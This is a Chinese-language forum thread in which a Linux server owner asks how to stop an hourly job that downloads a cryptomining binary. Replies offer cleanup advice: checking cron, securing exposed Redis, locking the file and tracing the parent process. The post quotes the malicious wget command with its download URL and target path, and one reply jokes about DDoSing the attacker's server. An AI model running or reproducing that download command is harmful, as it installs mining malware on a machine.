求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

2020-04-18 11:15:18 +08:00
 ying5201314
wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
ip 103.27.42.76 是日本
每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
没有找到定时任务
4964 次点击
所在节点    Linux
27 条回复
sadwin
2020-04-18 11:32:04 +08:00
有在跑 redis 吗? 有可能是 redis 被黑了
Hurriance
2020-04-18 11:34:25 +08:00
redis 上密码
renmu
2020-04-18 11:34:25 +08:00
cron 里没有?最好的方法就是重装系统
claysec
2020-04-18 11:38:40 +08:00
没有重要东西就直接重装系统。
sadwin
2020-04-18 11:45:14 +08:00
GGGG430
2020-04-18 11:45:57 +08:00
首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
其次可以通过 alias 重命名 wget 为其他命令
cnzjl
2020-04-18 11:48:23 +08:00
最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令
ik
2020-04-18 13:42:34 +08:00
建议重装,想排查问题可以先
> /usr/bin/uvggee
chmod 000 /usr/bin/uvggee
chattr +i /usr/bin/uvggee
然后再排查问题
imdong
2020-04-18 14:23:47 +08:00
非专业,笨笨的方法:

比如自己写一个 shell 命名为 wget,然后在里面获取一些父进程信息?
然后用这个 shell 替换(覆盖) wget ??
won
2020-04-18 14:32:35 +08:00
1 top 到进程号
2 ll 到执行位置
3 rm 掉
4 crontab 里删除,并添加一个 1 分钟守护
5 restart
i999999
2020-04-18 15:20:05 +08:00
建议重装系统,没办法重装的话可以把 wget 和 curl 工具重命名
guog
2020-04-18 15:23:14 +08:00
七天了,楼主这个问题还没解决?大家给你的方案你试过了吗
Rxianbei
2020-04-18 15:23:47 +08:00
@cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis,但是没有公网,装了都大半年了,想来也后怕,请问应该怎么排查?
ying5201314
2020-04-18 17:11:32 +08:00
试过了,主要不能重装,不然早解决
ying5201314
2020-04-18 17:16:49 +08:00
试过了,主要不能重装,不然早解决 1
@guog
defunct9
2020-04-18 17:28:34 +08:00
开 ssh,让我上去看看
xupefei
2020-04-18 17:30:06 +08:00
还有个可能是服务器跑了 yarn 。
Guys
2020-04-18 17:51:04 +08:00
先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.
musi
2020-04-18 17:51:28 +08:00
你在 v2 上发个求 d 帖把那个服务器 d 挂就好了
xingheng
2020-04-18 19:34:05 +08:00
pstree 找到是哪个主进程启动的 wget,然后删除主进程的执行文件就行了吧。难道还有守护进程??尝试 watch+pstree 。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/663696

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX